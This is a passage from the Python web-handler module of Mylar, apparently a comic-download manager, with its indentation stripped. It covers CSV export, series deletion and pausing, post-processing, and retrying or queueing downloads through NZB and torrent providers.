logger.info('%s Successfully Added %s' % (module, storyarcname))
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (storyarcid, storyarcname))
addStoryArc.exposed = True
def wanted_Export(self,mode):
import unicodedata
myDB = db.DBConnection()
wantlist = myDB.select("select b.ComicName, b.ComicYear, a.Issue_Number, a.IssueDate, a.ComicID, a.IssueID from issues a inner join comics b on a.ComicID=b.ComicID where a.status=? and b.ComicName is not NULL", [mode])
if wantlist is None:
logger.info("There aren't any issues marked as " + mode + ". Aborting Export.")
return
#write out a wanted_list.csv
logger.info("gathered data - writing to csv...")
wanted_file = os.path.join(mylar.DATA_DIR, str(mode) + "_list.csv")
if os.path.exists(wanted_file):
try:
os.remove(wanted_file)
except (OSError, IOError):
wanted_file_new = os.path.join(mylar.DATA_DIR, str(mode) + '_list-1.csv')
logger.warn('%s already exists. Writing to: %s' % (wanted_file, wanted_file_new))
wanted_file = wanted_file_new
wcount=0
with open(wanted_file, 'wb+') as f:
try:
fieldnames = ['SeriesName','SeriesYear','IssueNumber','IssueDate','ComicID','IssueID']
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
for want in wantlist:
writer.writerow({'SeriesName': want['ComicName'],
'SeriesYear': want['ComicYear'],
'IssueNumber': want['Issue_Number'],
'IssueDate': want['IssueDate'],
'ComicID': want['ComicID'],
'IssueID': want['IssueID']})
wcount += 1
except IOError as Argument:
logger.info("Error writing value to {}. {}".format(wanted_file, Argument))
except Exception as Argument:
logger.info("Unknown error: {}".format(Argument))
if wcount > 0:
logger.info('Successfully wrote to csv file %s entries from your %s list.' % (wcount, mode))
else:
logger.info('Nothing written to csv file for your %s list.' % mode)
raise cherrypy.HTTPRedirect("home")
wanted_Export.exposed = True
def from_Exceptions(self, comicid, gcdid, comicname=None, comicyear=None, comicissues=None, comicpublisher=None, imported=None, ogcname=None):
import unicodedata
mismatch = "yes"
#write it to the custom_exceptions.csv and reload it so that importer will pick it up and do it's thing :)
#custom_exceptions in this format...
#99, (comicid), (gcdid), none
logger.info("saving new information into custom_exceptions.csv...")
except_info = "none #" + str(comicname) + "-(" + str(comicyear) + ")\n"
except_file = os.path.join(mylar.DATA_DIR, "custom_exceptions.csv")
if not os.path.exists(except_file):
try:
csvfile = open(str(except_file), 'rb')
csvfile.close()
except (OSError, IOError):
logger.error("Could not locate " + str(except_file) + " file. Make sure it's in datadir: " + mylar.DATA_DIR + " with proper permissions.")
return
exceptln = "99," + str(comicid) + "," + str(gcdid) + "," + str(except_info)
exceptline = exceptln.decode('utf-8', 'ignore')
with open(str(except_file), 'a') as f:
#f.write('%s,%s,%s,%s\n' % ("99", comicid, gcdid, except_info)
f.write('%s\n' % (exceptline.encode('ascii', 'replace').strip()))
logger.info("re-loading csv file so it's all nice and current.")
mylar.csv_load()
if imported:
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None, imported, ogcname]).start()
else:
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
from_Exceptions.exposed = True
def GCDaddComic(self, comicid, comicname=None, comicyear=None, comicissues=None, comiccover=None, comicpublisher=None):
#since we already know most of the info, let's add it to the db so we can reference it later.
myDB = db.DBConnection()
gcomicid = "G" + str(comicid)
comicyear_len = comicyear.find(' ', 2)
comyear = comicyear[comicyear_len +1:comicyear_len +5]
if comyear.isdigit():
logger.fdebug("Series year set to : " + str(comyear))
else:
logger.fdebug("Invalid Series year detected - trying to adjust from " + str(comyear))
#comicyear_len above will trap wrong year if it's 10 October 2010 - etc ( 2000 AD)...
find_comicyear = comicyear.split()
for i in find_comicyear:
if len(i) == 4:
logger.fdebug("Series year detected as : " + str(i))
comyear = str(i)
continue
logger.fdebug("Series year set to: " + str(comyear))
controlValueDict = {'ComicID': gcomicid}
newValueDict = {'ComicName': comicname,
'ComicYear': comyear,
'ComicPublished': comicyear,
'ComicPublisher': comicpublisher,
'ComicImage': comiccover,
'Total': comicissues}
myDB.upsert("comics", newValueDict, controlValueDict)
threading.Thread(target=importer.GCDimport, args=[gcomicid]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % gcomicid)
GCDaddComic.exposed = True
def post_process(self, nzb_name, nzb_folder, failed=False, apc_version=None, comicrn_version=None):
if all([nzb_name != 'Manual Run', nzb_name != 'Manual+Run']):
if comicrn_version is None and apc_version is None:
logger.warn('ComicRN should be v' + str(mylar.STATIC_COMICRN_VERSION) + ' and autoProcessComics.py should be v' + str(mylar.STATIC_APC_VERSION) + ', but they are not and are out of date. Post-Processing may or may not work.')
elif comicrn_version is None or comicrn_version != mylar.STATIC_COMICRN_VERSION:
if comicrn_version == 'None':
comicrn_version = "0"
logger.warn('Your ComicRN.py script should be v' + str(mylar.STATIC_COMICRN_VERSION) + ', but is v' + str(comicrn_version) + ' and is out of date. Things may still work - but you are taking your chances.')
elif apc_version is None or apc_version != mylar.STATIC_APC_VERSION:
if apc_version == 'None':
apc_version = "0"
if mylar.CONFIG.AUTHENTICATION == 2:
logger.warn('YOU NEED TO UPDATE YOUR autoProcessComics.py file in order to use this option with the Forms Login enabled due to security.')
logger.warn('Your autoProcessComics.py script should be v' + str(mylar.STATIC_APC_VERSION) + ', but is v' + str(apc_version) + ' and is out of date. Odds are something is gonna fail - you should update it.')
else:
logger.info('ComicRN.py version: ' + str(comicrn_version) + ' -- autoProcessComics.py version: ' + str(apc_version))
import Queue
logger.info('Starting postprocessing for : ' + nzb_name)
if failed == '0':
failed = False
elif failed == '1':
failed = True
queue = Queue.Queue()
retry_outside = False
if not failed:
PostProcess = PostProcessor.PostProcessor(nzb_name, nzb_folder, queue=queue)
if nzb_name == 'Manual Run' or nzb_name == 'Manual+Run':
threading.Thread(target=PostProcess.Process).start()
#raise cherrypy.HTTPRedirect("home")
else:
thread_ = threading.Thread(target=PostProcess.Process, name="Post-Processing")
thread_.start()
thread_.join()
chk = queue.get()
while True:
if chk[0]['mode'] == 'fail':
yield chk[0]['self.log']
logger.info('Initiating Failed Download handling')
if chk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
failed = True
break
elif chk[0]['mode'] == 'stop':
yield chk[0]['self.log']
break
elif chk[0]['mode'] == 'outside':
yield chk[0]['self.log']
retry_outside = True
break
else:
logger.error('mode is unsupported: ' + chk[0]['mode'])
yield chk[0]['self.log']
break
if failed:
if mylar.CONFIG.FAILED_DOWNLOAD_HANDLING is True:
#drop the if-else continuation so we can drop down to this from the above if statement.
logger.info('Initiating Failed Download handling for this download.')
FailProcess = Failed.FailedProcessor(nzb_name=nzb_name, nzb_folder=nzb_folder, queue=queue)
thread_ = threading.Thread(target=FailProcess.Process, name="FAILED Post-Processing")
thread_.start()
thread_.join()
failchk = queue.get()
if failchk[0]['mode'] == 'retry':
yield failchk[0]['self.log']
logger.info('Attempting to return to search module with ' + str(failchk[0]['issueid']))
if failchk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
self.queueit(mode=mode, ComicName=failchk[0]['comicname'], ComicIssue=failchk[0]['issuenumber'], ComicID=failchk[0]['comicid'], IssueID=failchk[0]['issueid'], manualsearch=True)
elif failchk[0]['mode'] == 'stop':
yield failchk[0]['self.log']
else:
logger.error('mode is unsupported: ' + failchk[0]['mode'])
yield failchk[0]['self.log']
else:
logger.warn('Failed Download Handling is not enabled. Leaving Failed Download as-is.')
if retry_outside:
PostProcess = PostProcessor.PostProcessor('Manual Run', nzb_folder, queue=queue)
thread_ = threading.Thread(target=PostProcess.Process, name="Post-Processing")
thread_.start()
thread_.join()
chk = queue.get()
while True:
if chk[0]['mode'] == 'fail':
yield chk[0]['self.log']
logger.info('Initiating Failed Download handling')
if chk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
failed = True
break
elif chk[0]['mode'] == 'stop':
yield chk[0]['self.log']
break
else:
logger.error('mode is unsupported: ' + chk[0]['mode'])
yield chk[0]['self.log']
break
return
post_process.exposed = True
def pauseSeries(self, ComicID):
logger.info(u"Pausing comic: " + ComicID)
myDB = db.DBConnection()
controlValueDict = {'ComicID': ComicID}
newValueDict = {'Status': 'Paused'}
myDB.upsert("comics", newValueDict, controlValueDict)
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
pauseSeries.exposed = True
def resumeSeries(self, ComicID):
logger.info(u"Resuming comic: " + ComicID)
myDB = db.DBConnection()
controlValueDict = {'ComicID': ComicID}
newValueDict = {'Status': 'Active'}
myDB.upsert("comics", newValueDict, controlValueDict)
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
resumeSeries.exposed = True
def deleteSeries(self, ComicID, delete_dir=None):
myDB = db.DBConnection()
comic = myDB.selectone('SELECT * from comics WHERE ComicID=?', [ComicID]).fetchone()
if comic['ComicName'] is None: ComicName = "None"
else: ComicName = comic['ComicName']
seriesdir = comic['ComicLocation']
seriesyear = comic['ComicYear']
seriesvol = comic['ComicVersion']
logger.info(u"Deleting all traces of Comic: " + ComicName)
myDB.action('DELETE from comics WHERE ComicID=?', [ComicID])
myDB.action('DELETE from issues WHERE ComicID=?', [ComicID])
if mylar.CONFIG.ANNUALS_ON:
myDB.action('DELETE from annuals WHERE ComicID=?', [ComicID])
myDB.action('DELETE from upcoming WHERE ComicID=?', [ComicID])
if delete_dir: #mylar.CONFIG.DELETE_REMOVE_DIR:
logger.fdebug('Remove directory on series removal enabled.')
if os.path.exists(seriesdir):
logger.fdebug('Attempting to remove the directory and contents of : ' + seriesdir)
try:
shutil.rmtree(seriesdir)
except:
logger.warn('Unable to remove directory after removing series from Mylar.')
else:
logger.info('Successfully removed directory: %s' % (seriesdir))
else:
logger.warn('Unable to remove directory as it does not exist in : ' + seriesdir)
myDB.action('DELETE from readlist WHERE ComicID=?', [ComicID])
logger.info('Successful deletion of %s %s (%s) from your watchlist' % (ComicName, seriesvol, seriesyear))
helpers.ComicSort(sequence='update')
raise cherrypy.HTTPRedirect("home")
deleteSeries.exposed = True
def wipenzblog(self, ComicID=None, IssueID=None):
myDB = db.DBConnection()
if ComicID is None:
logger.fdebug("Wiping NZBLOG in it's entirety. You should NOT be downloading while doing this or else you'll lose the log for the download.")
myDB.action('DROP table nzblog')
logger.fdebug("Deleted nzblog table.")
myDB.action('CREATE TABLE IF NOT EXISTS nzblog (IssueID TEXT, NZBName TEXT, SARC TEXT, PROVIDER TEXT, ID TEXT, AltNZBName TEXT, OneOff TEXT)')
logger.fdebug("Re-created nzblog table.")
raise cherrypy.HTTPRedirect("history")
if IssueID:
logger.fdebug('Removing all download history for the given IssueID. This should allow post-processing to finish for the given IssueID.')
myDB.action('DELETE FROM nzblog WHERE IssueID=?', [IssueID])
logger.fdebug('Successfully removed all entries in the download log for IssueID: ' + str(IssueID))
raise cherrypy.HTTPRedirect("history")
wipenzblog.exposed = True
def refreshSeries(self, ComicID):
comicsToAdd = [ComicID]
logger.fdebug("Refreshing comic: %s" % comicsToAdd)
#myDB = db.DBConnection()
#myDB.upsert('comics', {'Status': 'Loading'}, {'ComicID': ComicID})
#threading.Thread(target=updater.dbUpdate, args=[comicsToAdd,'refresh']).start()
updater.dbUpdate(comicsToAdd, 'refresh')
refreshSeries.exposed = True
def issue_edit(self, id, value):
logger.fdebug('id: ' + str(id))
logger.fdebug('value: ' + str(value))
comicid = id[:id.find('.')]
logger.fdebug('comicid:' + str(comicid))
issueid = id[id.find('.') +1:]
logger.fdebug('issueid:' + str(issueid))
myDB = db.DBConnection()
comicchk = myDB.selectone('SELECT ComicYear FROM comics WHERE ComicID=?', [comicid]).fetchone()
issuechk = myDB.selectone('SELECT * FROM issues WHERE IssueID=?', [issueid]).fetchone()
if issuechk is None:
logger.error('Cannot edit this for some reason - something is wrong.')
return
oldissuedate = issuechk['IssueDate']
seriesyear = comicchk['ComicYear']
issuenumber = issuechk['Issue_Number']
#check if the new date is in the correct format of yyyy-mm-dd
try:
valid_date = time.strptime(value, '%Y-%m-%d')
except ValueError:
logger.error('invalid date provided. Rejecting edit.')
return oldissuedate
#if the new issue year is less than the series year - reject it.
if value[:4] < seriesyear:
logger.error('Series year of ' + str(seriesyear) + ' is less than new issue date of ' + str(value[:4]))
return oldissuedate
newVal = {"IssueDate": value,
"IssueDate_Edit": oldissuedate}
ctrlVal = {"IssueID": issueid}
myDB.upsert("issues", newVal, ctrlVal)
logger.info('Updated Issue Date for issue #' + str(issuenumber))
return value
issue_edit.exposed=True
def force_rss(self):
logger.info('Attempting to run RSS Check Forcibly')
forcethis = mylar.rsscheckit.tehMain()
threading.Thread(target=forcethis.run, args=[True]).start()
force_rss.exposed = True
def markannuals(self, ann_action=None, **args):
self.markissues(ann_action, **args)
markannuals.exposed = True
def markissues(self, action=None, **args):
myDB = db.DBConnection()
issuesToAdd = []
issuestoArchive = []
if action == 'WantedNew':
newaction = 'Wanted'
else:
newaction = action
for IssueID in args:
if any([IssueID is None, 'issue_table' in IssueID, 'history_table' in IssueID, 'manage_issues' in IssueID, 'issue_table_length' in IssueID, 'issues' in IssueID, 'annuals' in IssueID, 'annual_table_length' in IssueID]):
continue
else:
mi = myDB.selectone("SELECT * FROM issues WHERE IssueID=?", [IssueID]).fetchone()
annchk = 'no'
if mi is None:
if mylar.CONFIG.ANNUALS_ON:
mi = myDB.selectone("SELECT * FROM annuals WHERE IssueID=?", [IssueID]).fetchone()
comicname = mi['ReleaseComicName']
annchk = 'yes'
else:
comicname = mi['ComicName']
miyr = myDB.selectone("SELECT ComicYear FROM comics WHERE ComicID=?", [mi['ComicID']]).fetchone()
if action == 'Downloaded':
if mi['Status'] == "Skipped" or mi['Status'] == "Wanted":
logger.fdebug(u"Cannot change status to %s as comic is not Snatched or Downloaded" % (newaction))
continue
elif action == 'Archived':
logger.fdebug(u"Marking %s %s as %s" % (comicname, mi['Issue_Number'], newaction))
#updater.forceRescan(mi['ComicID'])
issuestoArchive.append(IssueID)
elif action == 'Wanted' or action == 'Retry':
if mi['Status'] == 'Wanted':
logger.fdebug('Issue already set to Wanted status - no need to change it again.')
continue
if action == 'Retry': newaction = 'Wanted'
logger.fdebug(u"Marking %s %s as %s" % (comicname, mi['Issue_Number'], newaction))
issuesToAdd.append(IssueID)
elif action == 'Skipped':
logger.fdebug(u"Marking " + str(IssueID) + " as Skipped")
elif action == 'Clear':
myDB.action("DELETE FROM snatched WHERE IssueID=?", [IssueID])
elif action == 'Failed' and mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
logger.fdebug('Marking [' + comicname + '] : ' + str(IssueID) + ' as Failed. Sending to failed download handler.')
failedcomicid = mi['ComicID']
failedissueid = IssueID
break
controlValueDict = {"IssueID": IssueID}
newValueDict = {"Status": newaction}
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
logger.fdebug("updated...to " + str(newaction))
if action == 'Failed' and mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
self.failed_handling(failedcomicid, failedissueid)
if len(issuestoArchive) > 0:
updater.forceRescan(mi['ComicID'])
if len(issuesToAdd) > 0:
logger.fdebug("Marking issues: %s as Wanted" % (issuesToAdd))
threading.Thread(target=search.searchIssueIDList, args=[issuesToAdd]).start()
#raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % mi['ComicID'])
markissues.exposed = True
def markentries(self, action=None, **args):
myDB = db.DBConnection()
cnt = 0
for ID in args:
logger.info(ID)
if any([ID is None, 'manage_failed_length' in ID]):
continue
else:
myDB.action("DELETE FROM Failed WHERE ID=?", [ID])
cnt+=1
logger.info('[DB FAILED CLEANSING] Cleared ' + str(cnt) + ' entries from the Failed DB so they will now be downloaded if available/working.')
markentries.exposed = True
def retryit(self, **kwargs):
threading.Thread(target=self.retryissue, kwargs=kwargs).start()
retryit.exposed = True
def retryissue(self, ComicName, ComicID, IssueID, IssueNumber, ReleaseComicID=None, ComicYear=None, redirect=None):
logger.info('ComicID:' + str(ComicID))
logger.info('Retrying : ' + str(IssueID))
# mode = either series or annual (want vs. want_ann)
#To retry the exact download again - we already have the nzb/torrent name stored in the nzblog.
#0 - Change status to Retrying.
#1 - we need to search the snatched table for the relevant information (since it HAS to be in snatched status)
#2 - we need to reference the ID from the snatched table to the nzblog table
# - if it doesn't match, then it's an invalid retry.
# - if it does match, we get the nzbname/torrent name and provider info
#3 - if it's an nzb - we recreate the sab/nzbget url and resubmit it directly.
# - if it's a torrent - we redownload the torrent and flip it to the watchdir on the local / seedbox.
#4 - Change status to Snatched.
myDB = db.DBConnection()
chk_snatch = myDB.select('SELECT * FROM snatched WHERE IssueID=?', [IssueID])
if chk_snatch is None:
logger.info('Unable to locate how issue was downloaded (name, provider). Cannot continue.')
return
providers_snatched = []
confirmedsnatch = False
for cs in chk_snatch:
if cs['Provider'] == 'CBT' or cs['Provider'] == 'KAT':
logger.info('Invalid provider attached to download (' + cs['Provider'] + '). I cannot find this on 32P, so ignoring this result.')
elif cs['Status'] == 'Snatched':
logger.info('Located snatched download:')
logger.info('--Referencing : ' + cs['Provider'] + ' @ ' + str(cs['DateAdded']))
providers_snatched.append({'Provider': cs['Provider'],
'DateAdded': cs['DateAdded']})
confirmedsnatch = True
elif (cs['Status'] == 'Post-Processed' or cs['Status'] == 'Downloaded') and confirmedsnatch == True:
logger.info('Issue has already been Snatched, Downloaded & Post-Processed.')
logger.info('You should be using Manual Search or Mark Wanted - not retry the same download.')
#return
if len(providers_snatched) == 0:
return
chk_logresults = []
for ps in sorted(providers_snatched, key=itemgetter('DateAdded', 'Provider'), reverse=True):
try:
Provider_sql = '%' + ps['Provider'] + '%'
chk_the_log = myDB.selectone('SELECT * FROM nzblog WHERE IssueID=? AND Provider like (?)', [IssueID, Provider_sql]).fetchone()
except:
logger.warn('Unable to locate provider reference for attempted Retry. Will see if I can just get the last attempted download.')
chk_the_log = myDB.selectone('SELECT * FROM nzblog WHERE IssueID=? and Provider != "CBT" and Provider != "KAT"', [IssueID]).fetchone()
if chk_the_log is None:
if len(providers_snatched) == 1:
logger.info('Unable to locate provider information ' + ps['Provider'] + ' from nzblog - if you wiped the log, you have to search/download as per normal')
return
else:
logger.info('Unable to locate provider information ' + ps['Provider'] + ' from nzblog. Checking additional providers that came back as being used to download this issue')
continue
else:
chk_logresults.append({'NZBName': chk_the_log['NZBName'],
'ID': chk_the_log['ID'],
'PROVIDER': chk_the_log['PROVIDER']})
if all([ComicYear is not None, ComicYear != 'None']) and all([IssueID is not None, IssueID != 'None']):
getYear = myDB.selectone('SELECT IssueDate, ReleaseDate FROM Issues WHERE IssueID=?', [IssueID]).fetchone()
if getYear is None:
logger.warn('Unable to retrieve valid Issue Date for Retry of Issue (Try to refresh the series and then try again.')
return
if getYear['IssueDate'][:4] == '0000':
if getYear['ReleaseDate'][:4] == '0000':
logger.warn('Unable to retrieve valid Issue Date for Retry of Issue (Try to refresh the series and then try again.')
return
else:
ComicYear = getYear['ReleaseDate'][:4]
else:
ComicYear = getYear['IssueDate'][:4]
for chk_log in chk_logresults:
nzbname = chk_log['NZBName']
id = chk_log['ID']
fullprov = chk_log['PROVIDER'] #the full newznab name if it exists will appear here as 'sitename (newznab)'
#now we break it down by provider to recreate the link.
#torrents first.
if any([fullprov == '32P', fullprov == 'WWT', fullprov == 'DEM']):
if not mylar.CONFIG.ENABLE_TORRENT_SEARCH:
logger.error('Torrent Providers are not enabled - unable to process retry request until provider is re-enabled.')
continue
if fullprov == '32P':
if not mylar.CONFIG.ENABLE_32P:
logger.error('32P is not enabled - unable to process retry request until provider is re-enabled.')
continue
elif any([fullprov == 'WWT', fullprov == 'DEM']):
if not mylar.CONFIG.ENABLE_PUBLIC:
logger.error('Public Torrents are not enabled - unable to process retry request until provider is re-enabled.')
continue
logger.fdebug("sending .torrent to watchdir.")
logger.fdebug("ComicName:" + ComicName)
logger.fdebug("Torrent Provider:" + fullprov)
logger.fdebug("Torrent ID:" + str(id))
rcheck = mylar.rsscheck.torsend2client(ComicName, IssueNumber, ComicYear, id, fullprov)
if rcheck == "fail":
logger.error("Unable to send torrent - check logs and settings.")
continue
else:
if any([mylar.USE_RTORRENT, mylar.USE_DELUGE]) and mylar.CONFIG.AUTO_SNATCH:
mylar.SNATCHED_QUEUE.put(rcheck['hash'])
elif mylar.CONFIG.ENABLE_SNATCH_SCRIPT:
#packs not supported on retry atm - Volume and Issuedate also not included due to limitations...
snatch_vars = {'comicinfo': {'comicname': ComicName,
'issuenumber': IssueNumber,
'seriesyear': ComicYear,
'comicid': ComicID,
'issueid': IssueID},
'pack': False,
'pack_numbers': None,
'pack_issuelist': None,
'provider': fullprov,
'method': 'torrent',
'clientmode': rcheck['clientmode'],
'torrentinfo': rcheck}
snatchitup = helpers.script_env('on-snatch',snatch_vars)
if snatchitup is True:
logger.info('Successfully submitted on-grab script as requested.')
else:
logger.info('Could not Successfully submit on-grab script as requested. Please check logs...')
logger.info('Successfully retried issue.')
break
else:
oneoff = False
chkthis = myDB.selectone('SELECT a.ComicID, a.ComicName, a.ComicVersion, a.ComicYear, b.IssueID, b.Issue_Number, b.IssueDate FROM comics as a INNER JOIN annuals as b ON a.ComicID = b.ComicID WHERE IssueID=?', [IssueID]).fetchone()
if chkthis is None:
chkthis = myDB.selectone('SELECT a.ComicID, a.ComicName, a.ComicVersion, a.ComicYear, b.IssueID, b.Issue_Number, b.IssueDate FROM comics as a INNER JOIN issues as b ON a.ComicID = b.ComicID WHERE IssueID=?', [IssueID]).fetchone()
if chkthis is None:
chkthis = myDB.selectone('SELECT ComicID, ComicName, year as ComicYear, IssueID, IssueNumber as Issue_number, weeknumber, year from oneoffhistory WHERE IssueID=?', [IssueID]).fetchone()
if chkthis is None:
logger.warn('Unable to locate previous snatch details (checked issues/annuals/one-offs). Retrying the snatch for this issue is unavailable.')
continue
else:
logger.fdebug('Successfully located issue as a one-off download initiated via pull-list. Let\'s do this....')
oneoff = True
modcomicname = chkthis['ComicName']
else:
modcomicname = chkthis['ComicName'] + ' Annual'
if oneoff is True:
weekchk = helpers.weekly_info(chkthis['weeknumber'], chkthis['year'])
IssueDate = weekchk['midweek']
ComicVersion = None
else:
IssueDate = chkthis['IssueDate']
ComicVersion = chkthis['ComicVersion']
comicinfo = []
comicinfo.append({"ComicName": chkthis['ComicName'],
"ComicVolume": ComicVersion,
"IssueNumber": chkthis['Issue_Number'],
"comyear": chkthis['ComicYear'],
"IssueDate": IssueDate,
"pack": False,
"modcomicname": modcomicname,
"oneoff": oneoff})
newznabinfo = None
link = None
if fullprov == 'nzb.su':
if not mylar.CONFIG.NZBSU:
logger.error('nzb.su is not enabled - unable to process retry request until provider is re-enabled.')
continue
# http://nzb.su/getnzb/ea1befdeee0affd663735b2b09010140.nzb&i=<uid>&r=<passkey>
link = 'http://nzb.su/getnzb/' + str(id) + '.nzb&i=' + str(mylar.CONFIG.NZBSU_UID) + '&r=' + str(mylar.CONFIG.NZBSU_APIKEY)
logger.info('fetched via nzb.su. Retrying the send : ' + str(link))
elif fullprov == 'dognzb':
if not mylar.CONFIG.DOGNZB:
logger.error('Dognzb is not enabled - unable to process retry request until provider is re-enabled.')
continue
# https://dognzb.cr/fetch/5931874bf7381b274f647712b796f0ac/<passkey>
link = 'https://dognzb.cr/fetch/' + str(id) + '/' + str(mylar.CONFIG.DOGNZB_APIKEY)
logger.info('fetched via dognzb. Retrying the send : ' + str(link))
elif fullprov == 'experimental':
if not mylar.CONFIG.EXPERIMENTAL:
logger.error('Experimental is not enabled - unable to process retry request until provider is re-enabled.')
continue
# http://nzbindex.nl/download/110818178
link = 'http://nzbindex.nl/download/' + str(id)
logger.info('fetched via experimental. Retrying the send : ' + str(link))
elif 'newznab' in fullprov:
if not mylar.CONFIG.NEWZNAB:
logger.error('Newznabs are not enabled - unable to process retry request until provider is re-enabled.')
continue
# http://192.168.2.2/getnzb/4323f9c567c260e3d9fc48e09462946c.nzb&i=<uid>&r=<passkey>
# trickier - we have to scroll through all the newznabs until we find a match.
logger.info('fetched via newnzab. Retrying the send.')
m = re.findall('[^()]+', fullprov)
tmpprov = m[0].strip()
for newznab_info in mylar.CONFIG.EXTRA_NEWZNABS:
if tmpprov.lower() in newznab_info[0].lower():
if (newznab_info[5] == '1' or newznab_info[5] == 1):
if newznab_info[1].endswith('/'):
newznab_host = newznab_info[1]
else:
newznab_host = newznab_info[1] + '/'
newznab_api = newznab_info[3]
newznab_uid = newznab_info[4]
link = str(newznab_host) + '/api?apikey=' + str(newznab_api) + '&t=get&id=' + str(id)
logger.info('newznab detected as : ' + str(newznab_info[0]) + ' @ ' + str(newznab_host))
logger.info('link : ' + str(link))
newznabinfo = (newznab_info[0], newznab_info[1], newznab_info[2], newznab_info[3], newznab_info[4])
else:
logger.error(str(newznab_info[0]) + ' is not enabled - unable to process retry request until provider is re-enabled.')
break
if link is not None:
sendit = search.searcher(fullprov, nzbname, comicinfo, link=link, IssueID=IssueID, ComicID=ComicID, tmpprov=fullprov, directsend=True, newznab=newznabinfo)
break
return
retryissue.exposed = True
def queueit(self, **kwargs):
threading.Thread(target=self.queueissue, kwargs=kwargs).start()
queueit.exposed = True
def queueissue(self, mode, ComicName=None, ComicID=None, ComicYear=None, ComicIssue=None, IssueID=None, new=False, redirect=None, SeriesYear=None, SARC=None, IssueArcID=None, manualsearch=None, Publisher=None, pullinfo=None, pullweek=None, pullyear=None, manual=False, ComicVersion=None, BookType=None):
logger.fdebug('ComicID: %s' % ComicID)
logger.fdebug('mode: %s' % mode)
now = datetime.datetime.now()
myDB = db.DBConnection()
#mode dictates type of queue - either 'want' for individual comics, or 'series' for series watchlist.
if ComicID is None and mode == 'series':
issue = None
raise cherrypy.HTTPRedirect("searchit?name=%s&issue=%s&mode=%s" % (ComicName, 'None', 'series'))
elif ComicID is None and mode == 'pullseries':
# we can limit the search by including the issue # and searching for
# comics that have X many issues
raise cherrypy.HTTPRedirect("searchit?name=%s&issue=%s&mode=%s" % (ComicName, 'None', 'pullseries'))
elif ComicID is None and mode == 'readlist':
# this is for marking individual comics from a readlist to be downloaded.
# Because there is no associated ComicID or IssueID, follow same pattern as in 'pullwant'
# except we know the Year
if len(ComicYear) > 4:
ComicYear = ComicYear[:4]
if SARC is None:
# it's just a readlist queue (no storyarc mode enabled)
SARC = True
IssueArcID = None
else:
logger.info('Story Arc : %s queueing selected issue...' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
#try to load the issue dates - can now sideload issue details.
dateload = myDB.selectone('SELECT * FROM storyarcs WHERE IssueArcID=?', [IssueArcID]).fetchone()
if dateload is None:
IssueDate = None
ReleaseDate = None
Publisher = None
SeriesYear = None
else:
IssueDate = dateload['IssueDate']
ReleaseDate = dateload['ReleaseDate']
Publisher = dateload['IssuePublisher']
SeriesYear = dateload['SeriesYear']
BookType = dateload['Type']
if ComicYear is None: ComicYear = SeriesYear
if dateload['Volume'] is None:
logger.info('Marking %s #%s as wanted...' % (ComicName, ComicIssue))
else:
logger.info('Marking %s (%s) #%s as wanted...' % (ComicName, dateload['Volume'], ComicIssue))
logger.fdebug('publisher: %s' % Publisher)
controlValueDict = {"IssueArcID": IssueArcID}
newStatus = {"Status": "Wanted"}
myDB.upsert("storyarcs", newStatus, controlValueDict)
moduletype = '[STORY-ARCS]'
passinfo = {'issueid': IssueArcID,
'comicname': ComicName,
'seriesyear': SeriesYear,
'comicid': ComicID,
'issuenumber': ComicIssue,
'booktype': BookType}
elif mode == 'pullwant': #and ComicID is None
#this is for marking individual comics from the pullist to be downloaded.
#--comicid & issueid may both be known (or either) at any given point if alt_pull = 2
#because ComicID and IssueID will both be None due to pullist, it's probably
#better to set both to some generic #, and then filter out later...
IssueDate = pullinfo
try:
SeriesYear = IssueDate[:4]
except:
SeriesYear == now.year
if Publisher == 'COMICS': Publisher = None
moduletype = '[PULL-LIST]'
passinfo = {'issueid': IssueID,
'comicname': ComicName,
'seriesyear': SeriesYear,
'comicid': ComicID,
'issuenumber': ComicIssue,
'booktype': BookType}
elif mode == 'want' or mode == 'want_ann' or manualsearch:
cdname = myDB.selectone("SELECT * from comics where ComicID=?", [ComicID]).fetchone()
ComicName_Filesafe = cdname['ComicName_Filesafe']
SeriesYear = cdname['ComicYear']
AlternateSearch = cdname['AlternateSearch']
Publisher = cdname['ComicPublisher']
UseAFuzzy = cdname['UseFuzzy']
AllowPacks= cdname['AllowPacks']
ComicVersion = cdname['ComicVersion']
ComicName = cdname['ComicName']
TorrentID_32p = cdname['TorrentID_32P']
BookType = cdname['Type']
controlValueDict = {"IssueID": IssueID}
newStatus = {"Status": "Wanted"}
if mode == 'want':
if manualsearch:
logger.info('Initiating manual search for %s issue: %s' % (ComicName, ComicIssue))
else:
logger.info('Marking %s issue: %s as wanted...' % (ComicName, ComicIssue))
myDB.upsert("issues", newStatus, controlValueDict)
else:
annual_name = myDB.selectone("SELECT * FROM annuals WHERE ComicID=? and IssueID=?", [ComicID, IssueID]).fetchone()
if annual_name is None:
logger.fdebug('Unable to locate.')
else:
ComicName = annual_name['ReleaseComicName']
if manualsearch:
logger.info('Initiating manual search for %s : %s' % (ComicName, ComicIssue))
else:
logger.info('Marking %s : %s as wanted...' % (ComicName, ComicIssue))
myDB.upsert("annuals", newStatus, controlValueDict)
moduletype = '[WANTED-SEARCH]'
passinfo = {'issueid': IssueID,
'comicname': ComicName,
'seriesyear': SeriesYear,
'comicid': ComicID,
'issuenumber': ComicIssue,
'booktype': BookType}
if mode == 'want':
issues = myDB.selectone("SELECT IssueDate, ReleaseDate FROM issues WHERE IssueID=?", [IssueID]).fetchone()
elif mode == 'want_ann':
